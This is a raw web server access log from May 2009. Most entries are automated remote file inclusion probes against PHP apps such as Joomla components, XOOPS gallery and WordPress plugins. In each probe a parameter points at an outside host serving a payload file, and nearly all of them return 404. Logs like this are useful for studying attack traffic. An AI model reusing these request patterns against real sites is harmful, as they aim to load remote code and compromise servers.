201.232.54.48 - - [29/May/2009:06:09:19 -0400] "GET /logs/access_log.Q109051500%20%20/components/com_sitemap/sitemap.xml.php?mosConfig_absolute_patch=http://www.xshellbrx.by.ru/id1.txt???? HTTP/1.1" 404 265 "-" "Mozilla/5.0"
66.249.68.17 - - [29/May/2009:06:09:21 -0400] "GET /logs/access_log.Q107110400 HTTP/1.1" 404 224 "-" "Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"
72.18.148.82 - - [29/May/2009:06:10:13 -0400] "GET /logs//modules/xoopsgallery/init_basic.php?GALLERY_BASEDIR=http://pacificdecor.org/vnc/fx29id.txt?? HTTP/1.1" 404 239 "-" "Mozilla/5.0"
72.18.148.82 - - [29/May/2009:06:10:13 -0400] "GET /logs/access_log.Q109051500%20%20//modules/xoopsgallery/init_basic.php?GALLERY_BASEDIR=http://pacificdecor.org/vnc/fx29id.txt?? HTTP/1.1" 404 263 "-" "Mozilla/5.0"
72.18.148.82 - - [29/May/2009:06:10:13 -0400] "GET //modules/xoopsgallery/init_basic.php?GALLERY_BASEDIR=http://pacificdecor.org/vnc/fx29id.txt?? HTTP/1.1" 404 234 "-" "Mozilla/5.0"
72.18.148.82 - - [29/May/2009:06:10:19 -0400] "GET /logs/access_log.Q109051600%20%20//modules/xoopsgallery/init_basic.php?GALLERY_BASEDIR=http://pacificdecor.org/vnc/fx29id.txt?? HTTP/1.1" 404 263 "-" "Mozilla/5.0"
72.18.148.82 - - [29/May/2009:06:10:27 -0400] "GET /index.php?configFile=http://pacificdecor.org/vnc/fx29id.txt?? HTTP/1.1" 404 207 "-" "Mozilla/5.0"
72.18.148.82 - - [29/May/2009:06:10:27 -0400] "GET /logs/index.php?configFile=http://pacificdecor.org/vnc/fx29id.txt?? HTTP/1.1" 404 212 "-" "Mozilla/5.0"
72.18.148.82 - - [29/May/2009:06:10:27 -0400] "GET /logs/access_log.Q109021500/index.php?configFile=http://pacificdecor.org/vnc/fx29id.txt?? HTTP/1.1" 404 234 "-" "Mozilla/5.0"
209.59.12.99 - - [29/May/2009:06:11:06 -0400] "GET / HTTP/1.0" 200 409 "-" "check_http/1.81 (nagios-plugins 1.4)"
203.151.233.72 - - [29/May/2009:06:11:29 -0400] "GET /logs//index.php?option=com_log&Itemid=&mosConfig_absolute_path=http://www.festzim.com/gks/tcl/FX29ID.txt?? HTTP/1.1" 404 213 "-" "Mozilla/5.0"
203.151.233.72 - - [29/May/2009:06:11:29 -0400] "GET /logs/access_log.Q109050700//index.php?option=com_log&Itemid=&mosConfig_absolute_path=http://www.festzim.com/gks/tcl/FX29ID.txt?? HTTP/1.1" 404 235 "-" "Mozilla/5.0"
203.151.233.72 - - [29/May/2009:06:11:29 -0400] "GET //index.php?option=com_log&Itemid=&mosConfig_absolute_path=http://www.festzim.com/gks/tcl/FX29ID.txt?? HTTP/1.1" 404 208 "-" "Mozilla/5.0"
123.125.64.38 - - [29/May/2009:06:11:38 -0400] "GET / HTTP/1.1" 200 409 "-" "Baiduspider+(+http://www.baidu.com/search/spider.htm)"
203.151.233.72 - - [29/May/2009:06:12:09 -0400] "GET //index.php?option=com_log&Itemid=&mosConfig_absolute_path=http://www.festzim.com/gks/tcl/FX29ID.txt?? HTTP/1.1" 404 208 "-" "Mozilla/5.0"
203.151.233.72 - - [29/May/2009:06:12:09 -0400] "GET /logs/access_log.Q109050700//index.php?option=com_log&Itemid=&mosConfig_absolute_path=http://www.festzim.com/gks/tcl/FX29ID.txt?? HTTP/1.1" 404 235 "-" "Mozilla/5.0"
203.151.233.72 - - [29/May/2009:06:12:09 -0400] "GET /logs//index.php?option=com_log&Itemid=&mosConfig_absolute_path=http://www.festzim.com/gks/tcl/FX29ID.txt?? HTTP/1.1" 404 213 "-" "Mozilla/5.0"
203.151.233.72 - - [29/May/2009:06:13:03 -0400] "GET /index.php?configFile=http://www.festzim.com/gks/tcl/FX29ID.txt?? HTTP/1.1" 404 207 "-" "Mozilla/5.0"
203.151.233.72 - - [29/May/2009:06:13:03 -0400] "GET /logs/index.php?configFile=http://www.festzim.com/gks/tcl/FX29ID.txt?? HTTP/1.1" 404 212 "-" "Mozilla/5.0"
203.151.233.72 - - [29/May/2009:06:13:03 -0400] "GET /logs/access_log.Q109021500/index.php?configFile=http://www.festzim.com/gks/tcl/FX29ID.txt?? HTTP/1.1" 404 234 "-" "Mozilla/5.0"
203.151.233.72 - - [29/May/2009:06:13:15 -0400] "GET //modules/xoopsgallery/init_basic.php?GALLERY_BASEDIR=http://www.festzim.com/gks/tcl/FX29ID.txt?? HTTP/1.1" 404 234 "-" "Mozilla/5.0"
203.151.233.72 - - [29/May/2009:06:13:15 -0400] "GET /logs//modules/xoopsgallery/init_basic.php?GALLERY_BASEDIR=http://www.festzim.com/gks/tcl/FX29ID.txt?? HTTP/1.1" 404 239 "-" "Mozilla/5.0"
203.151.233.72 - - [29/May/2009:06:13:15 -0400] "GET /logs/access_log.Q109051500%20%20//modules/xoopsgallery/init_basic.php?GALLERY_BASEDIR=http://www.festzim.com/gks/tcl/FX29ID.txt?? HTTP/1.1" 404 263 "-" "Mozilla/5.0"
203.151.233.72 - - [29/May/2009:06:13:22 -0400] "GET /logs/access_log.Q109051600%20%20//modules/xoopsgallery/init_basic.php?GALLERY_BASEDIR=http://www.festzim.com/gks/tcl/FX29ID.txt?? HTTP/1.1" 404 263 "-" "Mozilla/5.0"
203.151.233.72 - - [29/May/2009:06:13:42 -0400] "GET /logs/index.php?configFile=http://www.festzim.com/gks/tcl/FX29ID.txt?? HTTP/1.1" 404 212 "-" "Mozilla/5.0"
203.151.233.72 - - [29/May/2009:06:13:42 -0400] "GET /logs/access_log.Q109021500%20%20/index.php?configFile=http://www.festzim.com/gks/tcl/FX29ID.txt?? HTTP/1.1" 404 236 "-" "Mozilla/5.0"
203.151.233.72 - - [29/May/2009:06:13:42 -0400] "GET /index.php?configFile=http://www.festzim.com/gks/tcl/FX29ID.txt?? HTTP/1.1" 404 207 "-" "Mozilla/5.0"
121.188.91.69 - - [29/May/2009:06:14:10 -0400] "GET /logs/access_log.Q109050900//modules/vwar/convert/mvcw_conver.php?step=1&vwar_root=http://www.kq-china.com/web//plugins/system/id1.txt? HTTP/1.1" 404 262 "-" "Mozilla/5.0"
74.6.8.108 - - [29/May/2009:06:14:46 -0400] "GET /robots.txt HTTP/1.0" 404 208 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)"
74.6.8.108 - - [29/May/2009:06:14:47 -0400] "GET /images/_notes/ACE_logo.jpg.mno HTTP/1.0" 200 176 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp/3.0; http://help.yahoo.com/help/us/ysearch/slurp)"
209.59.12.99 - - [29/May/2009:06:16:05 -0400] "GET / HTTP/1.0" 200 409 "-" "check_http/1.81 (nagios-plugins 1.4)"
203.151.233.72 - - [29/May/2009:06:16:48 -0400] "GET /logs/error_log.Q109050700//index.php?option=com_log&Itemid=&mosConfig_absolute_path=http://www.festzim.com/gks/tcl/FX29ID.txt?? HTTP/1.1" 404 234 "-" "Mozilla/5.0"
222.122.160.145 - - [29/May/2009:06:16:59 -0400] "GET //technote7/skin_shop/standard/2_view_body/technote7/skin_shop/standard/3_plugin_twindow/skin_shop/standard/2_view_body/body_default.php?GOODS[no]=http://holytrinityparish.org/calndr_set/boxes/_notes/29id?? HTTP/1.1" 404 333 "-" "Mozilla/5.0"
222.122.160.145 - - [29/May/2009:06:16:59 -0400] "GET /logs//technote7/skin_shop/standard/2_view_body/technote7/skin_shop/standard/3_plugin_twindow/skin_shop/standard/2_view_body/body_default.php?GOODS[no]=http://holytrinityparish.org/calndr_set/boxes/_notes/29id?? HTTP/1.1" 404 338 "-" "Mozilla/5.0"
222.122.160.145 - - [29/May/2009:06:16:59 -0400] "GET /logs/access_log.Q109051800//technote7/skin_shop/standard/2_view_body/technote7/skin_shop/standard/3_plugin_twindow/skin_shop/standard/2_view_body/body_default.php?GOODS[no]=http://holytrinityparish.org/calndr_set/boxes/_notes/29id?? HTTP/1.1" 404 360 "-" "Mozilla/5.0"
123.125.64.51 - - [29/May/2009:06:17:14 -0400] "GET / HTTP/1.1" 200 409 "-" "Baiduspider+(+http://www.baidu.com/search/spider.htm)"
203.151.233.72 - - [29/May/2009:06:17:26 -0400] "GET /logs/access_log.Q109021500/index.php?configFile=http://www.festzim.com/gks/tcl/FX29ID.txt?? HTTP/1.1" 404 234 "-" "Mozilla/5.0"
222.122.160.145 - - [29/May/2009:06:17:29 -0400] "GET /logs/error_log.Q108103000//technote7/skin_shop/standard/2_view_body/technote7/skin_shop/standard/3_plugin_twindow/skin_shop/standard/2_view_body/body_default.php?GOODS[no]=http://holytrinityparish.org/calndr_set/boxes/_notes/29id?? HTTP/1.1" 404 359 "-" "Mozilla/5.0"
123.125.64.49 - - [29/May/2009:06:18:35 -0400] "GET / HTTP/1.1" 200 409 "-" "Baiduspider+(+http://www.baidu.com/search/spider.htm)"
222.122.160.145 - - [29/May/2009:06:19:46 -0400] "GET //technote7/skin_shop/standard/2_view_body/body_default.php?GOODS[no]=deadbeef&GOODS[gs_input]=deadbeef&shop_this_skin_path=http://holytrinityparish.org/calndr_set/boxes/_notes/29id?? HTTP/1.1" 404 256 "-" "Mozilla/5.0"
222.122.160.145 - - [29/May/2009:06:19:46 -0400] "GET /logs//technote7/skin_shop/standard/2_view_body/body_default.php?GOODS[no]=deadbeef&GOODS[gs_input]=deadbeef&shop_this_skin_path=http://holytrinityparish.org/calndr_set/boxes/_notes/29id?? HTTP/1.1" 404 261 "-" "Mozilla/5.0"
222.122.160.145 - - [29/May/2009:06:19:46 -0400] "GET /logs/error_log.Q108103000//technote7/skin_shop/standard/2_view_body/body_default.php?GOODS[no]=deadbeef&GOODS[gs_input]=deadbeef&shop_this_skin_path=http://holytrinityparish.org/calndr_set/boxes/_notes/29id?? HTTP/1.1" 404 282 "-" "Mozilla/5.0"
203.151.233.72 - - [29/May/2009:06:20:44 -0400] "GET /logs//modules/xoopsgallery/init_basic.php?GALLERY_BASEDIR=http://www.festzim.com/gks/tcl/FX29ID.txt?? HTTP/1.1" 404 239 "-" "Mozilla/5.0"
203.151.233.72 - - [29/May/2009:06:20:44 -0400] "GET //modules/xoopsgallery/init_basic.php?GALLERY_BASEDIR=http://www.festzim.com/gks/tcl/FX29ID.txt?? HTTP/1.1" 404 234 "-" "Mozilla/5.0"
203.151.233.72 - - [29/May/2009:06:20:44 -0400] "GET /logs/access_log.Q109050700%20%20//index.php?option=com_log&Itemid=&mosConfig_absolute_path=http://www.festzim.com/gks/tcl/FX29ID.txt?? HTTP/1.1" 404 237 "-" "Mozilla/5.0"
72.18.148.82 - - [29/May/2009:06:20:48 -0400] "GET /logs/access_log.Q109021500%20%20/index.php?configFile=http://pacificdecor.org/vnc/fx29id.txt?? HTTP/1.1" 404 236 "-" "Mozilla/5.0"
72.18.148.82 - - [29/May/2009:06:21:01 -0400] "GET /logs/access_log.Q109013000%20%20/index.php?configFile=http://pacificdecor.org/vnc/fx29id.txt?? HTTP/1.1" 404 236 "-" "Mozilla/5.0"
209.59.12.99 - - [29/May/2009:06:21:06 -0400] "GET / HTTP/1.0" 200 409 "-" "check_http/1.81 (nagios-plugins 1.4)"
203.151.233.72 - - [29/May/2009:06:21:09 -0400] "GET /logs/access_log.Q109051500//modules/xoopsgallery/init_basic.php?GALLERY_BASEDIR=http://www.festzim.com/gks/tcl/FX29ID.txt?? HTTP/1.1" 404 261 "-" "Mozilla/5.0"
222.122.160.145 - - [29/May/2009:06:21:50 -0400] "GET /logs/access_log.Q109051800//technote7/skin_shop/standard/2_view_body/body_default.php?GOODS[no]=deadbeef&GOODS[gs_input]=deadbeef&shop_this_skin_path=http://holytrinityparish.org/calndr_set/boxes/_notes/29id?? HTTP/1.1" 404 283 "-" "Mozilla/5.0"
217.147.29.190 - - [29/May/2009:06:23:29 -0400] "GET /administrator/components/com_comprofiler/plugin.class.php?mosConfig_absolute_path=http://striderrider.com/plugins/system/legacy/simple.jpg? HTTP/1.1" 404 255 "-" "Mozilla/5.0"
217.147.29.190 - - [29/May/2009:06:23:29 -0400] "GET /logs/administrator/components/com_comprofiler/plugin.class.php?mosConfig_absolute_path=http://striderrider.com/plugins/system/legacy/simple.jpg? HTTP/1.1" 404 260 "-" "Mozilla/5.0"
207.44.232.81 - - [29/May/2009:06:23:35 -0400] "GET /logs/administrator/components/com_comprofiler/plugin.class.php?mosConfig_absolute_path=http://striderrider.com/plugins/system/legacy/simple.jpg? HTTP/1.1" 404 260 "-" "Mozilla/5.0"
207.44.232.81 - - [29/May/2009:06:23:35 -0400] "GET /administrator/components/com_comprofiler/plugin.class.php?mosConfig_absolute_path=http://striderrider.com/plugins/system/legacy/simple.jpg? HTTP/1.1" 404 255 "-" "Mozilla/5.0"
203.151.233.72 - - [29/May/2009:06:24:40 -0400] "GET /logs/access_log.Q109021500%20%20/index.php?configFile=http://www.festzim.com/gks/tcl/FX29ID.txt?? HTTP/1.1" 404 236 "-" "Mozilla/5.0"
203.151.233.72 - - [29/May/2009:06:25:22 -0400] "GET /logs/access_log.Q109013000%20%20/index.php?configFile=http://www.festzim.com/gks/tcl/FX29ID.txt?? HTTP/1.1" 404 236 "-" "Mozilla/5.0"
91.121.174.74 - - [29/May/2009:06:25:28 -0400] "GET //wp-content/plugins/mygallery/myfunctions/mygallerybrowser.php?myPath=http://www.ks-bank.ru/images/baner.txt?? HTTP/1.1" 404 260 "-" "Mozilla/5.0"
91.121.174.74 - - [29/May/2009:06:25:28 -0400] "GET /logs/access_log.Q109010700//wp-content/plugins/mygallery/myfunctions/mygallerybrowser.php?myPath=http://www.ks-bank.ru/images/baner.txt?? HTTP/1.1" 404 287 "-" "Mozilla/5.0"
91.121.174.74 - - [29/May/2009:06:25:28 -0400] "GET /logs//wp-content/plugins/mygallery/myfunctions/mygallerybrowser.php?myPath=http://www.ks-bank.ru/images/baner.txt?? HTTP/1.1" 404 265 "-" "Mozilla/5.0"
91.121.174.74 - - [29/May/2009:06:25:28 -0400] "GET /logs/access_log.Q109052200//wp-content/plugins/mygallery/myfunctions/mygallerybrowser.php?myPath=http://www.ks-bank.ru/images/baner.txt?? HTTP/1.1" 404 287 "-" "Mozilla/5.0"
77.221.130.17 - - [29/May/2009:06:25:59 -0400] "GET //wp-content/plugins/mygallery/myfunctions/mygallerybrowser.php?myPath=http://www.prof-perevod.ru/img/office1.jpg??? HTTP/1.1" 404 260 "-" "Mozilla/5.0"
77.221.130.17 - - [29/May/2009:06:25:59 -0400] "GET /logs/access_log.Q109010700//wp-content/plugins/mygallery/myfunctions/mygallerybrowser.php?myPath=http://www.prof-perevod.ru/img/office1.jpg??? HTTP/1.1" 404 287 "-" "Mozilla/5.0"
77.221.130.17 - - [29/May/2009:06:25:59 -0400] "GET /logs//wp-content/plugins/mygallery/myfunctions/mygallerybrowser.php?myPath=http://www.prof-perevod.ru/img/office1.jpg??? HTTP/1.1" 404 265 "-" "Mozilla/5.0"
77.221.130.17 - - [29/May/2009:06:26:03 -0400] "GET /logs/access_log.Q109052200//wp-content/plugins/mygallery/myfunctions/mygallerybrowser.php?myPath=http://www.prof-perevod.ru/img/office1.jpg??? HTTP/1.1" 404 287 "-" "Mozilla/5.0"
209.59.12.99 - - [29/May/2009:06:26:06 -0400] "GET / HTTP/1.0" 200 409 "-" "check_http/1.81 (nagios-plugins 1.4)"
121.188.91.69 - - [29/May/2009:06:27:50 -0400] "GET //wp-content/plugins/mygallery/myfunctions/mygallerybrowser.php?myPath=http://www.prof-perevod.ru/img/office1.jpg??? HTTP/1.1" 404 260 "-" "Mozilla/5.0"
121.188.91.69 - - [29/May/2009:06:27:50 -0400] "GET /logs/access_log.Q109010700//wp-content/plugins/mygallery/myfunctions/mygallerybrowser.php?myPath=http://www.prof-perevod.ru/img/office1.jpg??? HTTP/1.1" 404 287 "-" "Mozilla/5.0"
121.188.91.69 - - [29/May/2009:06:27:50 -0400] "GET /logs//wp-content/plugins/mygallery/myfunctions/mygallerybrowser.php?myPath=http://www.prof-perevod.ru/img/office1.jpg??? HTTP/1.1" 404 265 "-" "Mozilla/5.0"
121.188.91.69 - - [29/May/2009:06:27:54 -0400] "GET /logs/access_log.Q109052200//wp-content/plugins/mygallery/myfunctions/mygallerybrowser.php?myPath=http://www.prof-perevod.ru/img/office1.jpg??? HTTP/1.1" 404 287 "-" "Mozilla/5.0"
222.122.72.93 - - [29/May/2009:06:28:32 -0400] "GET /logs//wp-content/plugins/mygallery/myfunctions/mygallerybrowser.php?myPath=http://www.prof-perevod.ru/img/office1.jpg??? HTTP/1.1" 404 265 "-" "Mozilla/5.0"
222.122.72.93 - - [29/May/2009:06:28:32 -0400] "GET /logs/access_log.Q109010700//wp-content/plugins/mygallery/myfunctions/mygallerybrowser.php?myPath=http://www.prof-perevod.ru/img/office1.jpg??? HTTP/1.1" 404 287 "-" "Mozilla/5.0"
222.122.72.93 - - [29/May/2009:06:28:32 -0400] "GET //wp-content/plugins/mygallery/myfunctions/mygallerybrowser.php?myPath=http://www.prof-perevod.ru/img/office1.jpg??? HTTP/1.1" 404 260 "-" "Mozilla/5.0"
222.122.72.93 - - [29/May/2009:06:28:32 -0400] "GET /logs/access_log.Q109052200//wp-content/plugins/mygallery/myfunctions/mygallerybrowser.php?myPath=http://www.prof-perevod.ru/img/office1.jpg??? HTTP/1.1" 404 287 "-" "Mozilla/5.0"
77.221.130.17 - - [29/May/2009:06:28:33 -0400] "GET /logs/access_log.Q109052200%20%20//wp-content/plugins/mygallery/myfunctions/mygallerybrowser.php?myPath=http://www.prof-perevod.ru/img/office1.jpg??? HTTP/1.1" 404 289 "-" "Mozilla/5.0"
77.221.130.17 - - [29/May/2009:06:28:33 -0400] "GET /logs/access_log.Q109010700%20%20//wp-content/plugins/mygallery/myfunctions/mygallerybrowser.php?myPath=http://www.prof-perevod.ru/img/office1.jpg??? HTTP/1.1" 404 289 "-" "Mozilla/5.0"
91.121.174.74 - - [29/May/2009:06:28:56 -0400] "GET /logs/access_log.Q109010700%20%20//wp-content/plugins/mygallery/myfunctions/mygallerybrowser.php?myPath=http://www.ks-bank.ru/images/baner.txt?? HTTP/1.1" 404 289 "-" "Mozilla/5.0"
91.121.174.74 - - [29/May/2009:06:28:56 -0400] "GET /logs/access_log.Q109052200%20%20//wp-content/plugins/mygallery/myfunctions/mygallerybrowser.php?myPath=http://www.ks-bank.ru/images/baner.txt?? HTTP/1.1" 404 289 "-" "Mozilla/5.0"
221.139.104.104 - - [29/May/2009:06:29:29 -0400] "GET //ashnews.php?pathtoashnews=http://www.dwno.or.kr/bbs/config/id1.txt?? HTTP/1.1" 404 210 "-" "Mozilla/5.0"
221.139.104.104 - - [29/May/2009:06:29:29 -0400] "GET /logs//ashnews.php?pathtoashnews=http://www.dwno.or.kr/bbs/config/id1.txt?? HTTP/1.1" 404 215 "-" "Mozilla/5.0"
221.139.104.104 - - [29/May/2009:06:29:54 -0400] "GET /logs/access_log.Q109050700%20%20//ashnews.php?pathtoashnews=http://www.dwno.or.kr/bbs/config/id1.txt?? HTTP/1.1" 404 239 "-" "Mozilla/5.0"
74.6.8.108 - - [29/May/2009:06:30:24 -0400] "GET /images/ HTTP/1.0" 200 49338 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp/3.0; http://help.yahoo.com/help/us/ysearch/slurp)"
217.147.29.190 - - [29/May/2009:06:30:33 -0400] "GET /logs/access_log.Q109051500/administrator/components/com_comprofiler/plugin.class.php?mosConfig_absolute_path=http://striderrider.com/plugins/system/legacy/simple.jpg? HTTP/1.1" 404 282 "-" "Mozilla/5.0"
222.122.72.93 - - [29/May/2009:06:30:34 -0400] "GET /logs/access_log.Q109050900//wp-content/plugins/mygallery/myfunctions/mygallerybrowser.php?myPath=http://www.prof-perevod.ru/img/office1.jpg??? HTTP/1.1" 404 287 "-" "Mozilla/5.0"
217.147.29.190 - - [29/May/2009:06:30:40 -0400] "GET /logs/access_log.Q109051700/administrator/components/com_comprofiler/plugin.class.php?mosConfig_absolute_path=http://striderrider.com/plugins/system/legacy/simple.jpg? HTTP/1.1" 404 282 "-" "Mozilla/5.0"
209.59.12.99 - - [29/May/2009:06:31:06 -0400] "GET / HTTP/1.0" 200 409 "-" "check_http/1.81 (nagios-plugins 1.4)"
72.18.148.82 - - [29/May/2009:06:31:10 -0400] "GET /index.php?inhalt=http://pacificdecor.org/vnc/fx29id.txt?? HTTP/1.1" 404 207 "-" "Mozilla/5.0"
72.18.148.82 - - [29/May/2009:06:31:10 -0400] "GET /logs/index.php?inhalt=http://pacificdecor.org/vnc/fx29id.txt?? HTTP/1.1" 404 212 "-" "Mozilla/5.0"
208.103.111.2 - - [29/May/2009:06:31:26 -0400] "GET //skin/zero_vote/ask_password.php?dir=http://poisonx.ucoz.com/braid.txt?? HTTP/1.1" 404 230 "-" "Mozilla/5.0"
208.103.111.2 - - [29/May/2009:06:31:26 -0400] "GET /logs//skin/zero_vote/ask_password.php?dir=http://poisonx.ucoz.com/braid.txt?? HTTP/1.1" 404 235 "-" "Mozilla/5.0"
221.139.104.104 - - [29/May/2009:06:31:51 -0400] "GET /logs/access_log.Q109050700//ashnews.php?pathtoashnews=http://www.dwno.or.kr/bbs/config/id1.txt?? HTTP/1.1" 404 237 "-" "Mozilla/5.0"
121.188.91.69 - - [29/May/2009:06:32:14 -0400] "GET /logs/access_log.Q109050900//wp-content/plugins/mygallery/myfunctions/mygallerybrowser.php?myPath=http://www.prof-perevod.ru/img/office1.jpg??? HTTP/1.1" 404 287 "-" "Mozilla/5.0"
121.188.91.69 - - [29/May/2009:06:33:15 -0400] "GET /logs/access_log.Q109010700%20%20//wp-content/plugins/mygallery/myfunctions/mygallerybrowser.php?myPath=http://www.prof-perevod.ru/img/office1.jpg??? HTTP/1.1" 404 289 "-" "Mozilla/5.0"
121.188.91.69 - - [29/May/2009:06:33:15 -0400] "GET /logs/access_log.Q109052200%20%20//wp-content/plugins/mygallery/myfunctions/mygallerybrowser.php?myPath=http://www.prof-perevod.ru/img/office1.jpg??? HTTP/1.1" 404 289 "-" "Mozilla/5.0"
202.75.4.169 - - [29/May/2009:06:34:35 -0400] "GET /logs/access_log.Q109052100/index.php?option=com_comprofiler&task=section&id=1&Itemid=2&mosConfig_absolute_path=http://home.covenantberks.org/images/kampret.jpg?? HTTP/1.1" 404 234 "-" "libwww-perl/5.79"
202.75.4.169 - - [29/May/2009:06:34:36 -0400] "GET /index.php?option=com_comprofiler&task=section&id=1&Itemid=2&mosConfig_absolute_path=http://home.covenantberks.org/images/kampret.jpg?? HTTP/1.1" 404 207 "-" "libwww-perl/5.79"
202.75.4.169 - - [29/May/2009:06:34:37 -0400] "GET /logs/index.php?option=com_comprofiler&task=section&id=1&Itemid=2&mosConfig_absolute_path=http://home.covenantberks.org/images/kampret.jpg?? HTTP/1.1" 404 212 "-" "libwww-perl/5.79"
91.121.174.74 - - [29/May/2009:06:34:46 -0400] "GET /logs/access_log.Q109050900//wp-content/plugins/mygallery/myfunctions/mygallerybrowser.php?myPath=http://www.ks-bank.ru/images/baner.txt?? HTTP/1.1" 404 287 "-" "Mozilla/5.0"
91.121.174.74 - - [29/May/2009:06:34:52 -0400] "GET /logs/error_log.Q109052000//wp-content/plugins/mygallery/myfunctions/mygallerybrowser.php?myPath=http://www.ks-bank.ru/images/baner.txt?? HTTP/1.1" 404 286 "-" "Mozilla/5.0"
221.139.104.104 - - [29/May/2009:06:35:11 -0400] "GET /logs/access_log.Q108091400//ashnews.php?pathtoashnews=http://www.dwno.or.kr/bbs/config/id1.txt?? HTTP/1.1" 404 237 "-" "Mozilla/5.0"
209.59.12.99 - - [29/May/2009:06:36:06 -0400] "GET / HTTP/1.0" 200 409 "-" "check_http/1.81 (nagios-plugins 1.4)"
201.232.54.48 - - [29/May/2009:06:36:13 -0400] "GET //modules/TotalCalendar/about.php?inc_dir=http://chicken.ucoz.org/id1.txt??? HTTP/1.1" 404 230 "-" "Mozilla/5.0"
201.232.54.48 - - [29/May/2009:06:36:13 -0400] "GET /logs//modules/TotalCalendar/about.php?inc_dir=http://chicken.ucoz.org/id1.txt??? HTTP/1.1" 404 235 "-" "Mozilla/5.0"
201.232.54.48 - - [29/May/2009:06:36:16 -0400] "GET /logs/access_log.Q109052200//modules/TotalCalendar/about.php?inc_dir=http://chicken.ucoz.org/id1.txt??? HTTP/1.1" 404 257 "-" "Mozilla/5.0"
201.232.54.48 - - [29/May/2009:06:36:18 -0400] "GET /logs//modules/TotalCalendar/about.php?inc_dir=http://chicken.ucoz.org/id1.txt??? HTTP/1.1" 404 235 "-" "Mozilla/5.0"
201.232.54.48 - - [29/May/2009:06:36:18 -0400] "GET /logs/access_log.Q109052200%20%20//modules/TotalCalendar/about.php?inc_dir=http://chicken.ucoz.org/id1.txt??? HTTP/1.1" 404 259 "-" "Mozilla/5.0"
201.232.54.48 - - [29/May/2009:06:36:18 -0400] "GET //modules/TotalCalendar/about.php?inc_dir=http://chicken.ucoz.org/id1.txt??? HTTP/1.1" 404 230 "-" "Mozilla/5.0"
201.232.54.48 - - [29/May/2009:06:36:29 -0400] "GET /logs//modules/TotalCalendar/about.php?inc_dir=http://chicken.ucoz.org/id1.txt??? HTTP/1.1" 404 235 "-" "Mozilla/5.0"
201.232.54.48 - - [29/May/2009:06:36:29 -0400] "GET //modules/TotalCalendar/about.php?inc_dir=http://chicken.ucoz.org/id1.txt??? HTTP/1.1" 404 230 "-" "Mozilla/5.0"
201.232.54.48 - - [29/May/2009:06:36:29 -0400] "GET /logs/access_log.Q109052200//modules/TotalCalendar/about.php?inc_dir=http://chicken.ucoz.org/id1.txt??? HTTP/1.1" 404 257 "-" "Mozilla/5.0"
201.232.54.48 - - [29/May/2009:06:36:43 -0400] "GET /logs//modules/TotalCalendar/about.php?inc_dir=http://chicken.ucoz.org/id1.txt??? HTTP/1.1" 404 235 "-" "Mozilla/5.0"
201.232.54.48 - - [29/May/2009:06:36:43 -0400] "GET //modules/TotalCalendar/about.php?inc_dir=http://chicken.ucoz.org/id1.txt??? HTTP/1.1" 404 230 "-" "Mozilla/5.0"
201.232.54.48 - - [29/May/2009:06:36:43 -0400] "GET /logs/access_log.Q109052200//modules/TotalCalendar/about.php?inc_dir=http://chicken.ucoz.org/id1.txt??? HTTP/1.1" 404 257 "-" "Mozilla/5.0"
201.232.54.48 - - [29/May/2009:06:36:52 -0400] "GET //modules/TotalCalendar/about.php?inc_dir=http://chicken.ucoz.org/id1.txt??? HTTP/1.1" 404 230 "-" "Mozilla/5.0"
201.232.54.48 - - [29/May/2009:06:36:52 -0400] "GET /logs/access_log.Q109052200%20%20//modules/TotalCalendar/about.php?inc_dir=http://chicken.ucoz.org/id1.txt??? HTTP/1.1" 404 259 "-" "Mozilla/5.0"
201.232.54.48 - - [29/May/2009:06:36:52 -0400] "GET /logs//modules/TotalCalendar/about.php?inc_dir=http://chicken.ucoz.org/id1.txt??? HTTP/1.1" 404 235 "-" "Mozilla/5.0"
69.50.197.106 - - [29/May/2009:06:37:18 -0400] "GET /logs/components/com_performs/performs.php?mosConfig_absolute_path=http://www.xshellbrx.by.ru/id1.txt?? HTTP/1.1" 404 239 "-" "Mozilla/5.0"
69.50.197.106 - - [29/May/2009:06:37:18 -0400] "GET /components/com_performs/performs.php?mosConfig_absolute_path=http://www.xshellbrx.by.ru/id1.txt?? HTTP/1.1" 404 234 "-" "Mozilla/5.0"
69.50.197.106 - - [29/May/2009:06:37:18 -0400] "GET /logs/access_log.Q109050900/components/com_performs/performs.php?mosConfig_absolute_path=http://www.xshellbrx.by.ru/id1.txt?? HTTP/1.1" 404 261 "-" "Mozilla/5.0"
213.206.93.3 - - [29/May/2009:06:37:55 -0400] "GET /logs/error_log.Q108113000/index.php?option=com_joomfish&task=section&id=1&Itemid=2&mosConfig_absolute_path=http://www.gsmch.org/club/chi.txt?? HTTP/1.1" 404 233 "-" "libwww-perl/5.805"
213.206.93.3 - - [29/May/2009:06:37:55 -0400] "GET /index.php?option=com_joomfish&task=section&id=1&Itemid=2&mosConfig_absolute_path=http://www.gsmch.org/club/chi.txt?? HTTP/1.1" 404 207 "-" "libwww-perl/5.805"
